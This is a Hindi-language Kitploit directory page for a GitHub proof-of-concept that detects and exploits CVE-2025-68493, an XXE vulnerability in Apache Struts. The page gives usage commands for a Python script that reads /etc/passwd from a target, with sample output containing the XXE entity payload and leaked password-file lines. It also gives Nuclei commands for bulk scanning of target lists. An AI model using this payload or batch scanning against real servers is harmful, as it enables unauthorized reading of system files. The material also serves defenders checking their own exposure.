Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-68493 — CVE-2025-68493 का पता लगाने और शोषण करने के लिए पायथन PoC स्क्रिप्ट और Nuclei YAML टेम्पलेट, Apache Struts में एक XXE भेद्यता, फ़ाइल पढ़ने और बैच स्कैनिंग सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/hsltz/cve-2025-68493
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubhsltz/cve-2025-68493

CVE-2025-68493

CVE-2025-68493 का पता लगाने और शोषण करने के लिए पायथन PoC स्क्रिप्ट और Nuclei YAML टेम्पलेट, Apache Struts में एक XXE भेद्यता, फ़ाइल पढ़ने और बैच स्कैनिंग सक्षम करता है।

रिपॉजिटरी देखें
217 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68493

CVE-2025-68493

7. संदर्भ

[1] ApacheStrutsXWorkXML भेद्यता CVE-2025-68493 PoC और स्क्रिप्ट | ZONE.CI वैश्विक नेटवर्क. https://zone.ci/secarticles/wx/486533.html

8. भेद्यता सत्यापन और शोषण

CVE-2025-68493 भेद्यता को सत्यापित और शोषण करने के लिए, नीचे दिए गए Python PoC स्क्रिप्ट और Nuclei YAML टेम्पलेट का उपयोग किया जा सकता है।

8.1 Python PoC स्क्रिप्ट उपयोग विधि

स्क्रिप्ट नाम: cve_2025_68493_poc.py

कार्यक्षमता: यह स्क्रिप्ट एकल लक्ष्य पर भेद्यता सत्यापन करने के लिए उपयोग की जाती है, निर्दिष्ट फ़ाइल (डिफ़ॉल्ट रूप से /etc/passwd) को पढ़ने का प्रयास करती है।

पूर्वापेक्षाएँ:

  • Python 3 वातावरण
  • requests लाइब्रेरी (pip install requests)

कमांड लाइन पैरामीटर:

  • -u, --url: लक्ष्य एप्लिकेशन का आधार URL (उदाहरण: http://127.0.0.1:8080)
  • -f, --file: पढ़ने का प्रयास करने के लिए लक्ष्य फ़ाइल पथ (डिफ़ॉल्ट रूप से /etc/passwd)

उदाहरण:

root@kitploit:~
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd

अपेक्षित आउटपुट:

यदि लक्ष्य में भेद्यता मौजूद है और फ़ाइल सफलतापूर्वक पढ़ी जाती है, तो निम्नलिखित जैसा आउटपुट दिखाई देगा:

root@kitploit:~
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------

8.2 Nuclei YAML टेम्पलेट उपयोग विधि

टेम्पलेट नाम: cve-2025-68493.yaml

कार्यक्षमता: यह टेम्पलेट Nuclei टूल का उपयोग करके कई लक्ष्यों पर बल्क स्कैन करने के लिए उपयोग किया जाता है, ताकि CVE-2025-68493 भेद्यता का पता लगाया जा सके।

पूर्वापेक्षाएँ:

  • Nuclei टूल स्थापित हो (अनुशंसित v3.x या उच्चतर संस्करण)

कमांड लाइन पैरामीटर:

  • -t: Nuclei टेम्पलेट फ़ाइल पथ निर्दिष्ट करें
  • -u: एकल लक्ष्य URL निर्दिष्ट करें
  • -l: कई लक्ष्य URL वाली फ़ाइल निर्दिष्ट करें

उदाहरण:

एकल लक्ष्य स्कैन:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -u http://example.com:8080

बल्क स्कैन:

मान लें कि आपके पास targets.txt नामक एक फ़ाइल है, जिसमें प्रत्येक पंक्ति में एक लक्ष्य URL है:

root@kitploit:~
http://target1.com:8080
http://target2.com:8080

बल्क स्कैन करने के लिए निम्न कमांड चलाएँ:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -l targets.txt
टूल डाउनलोड करें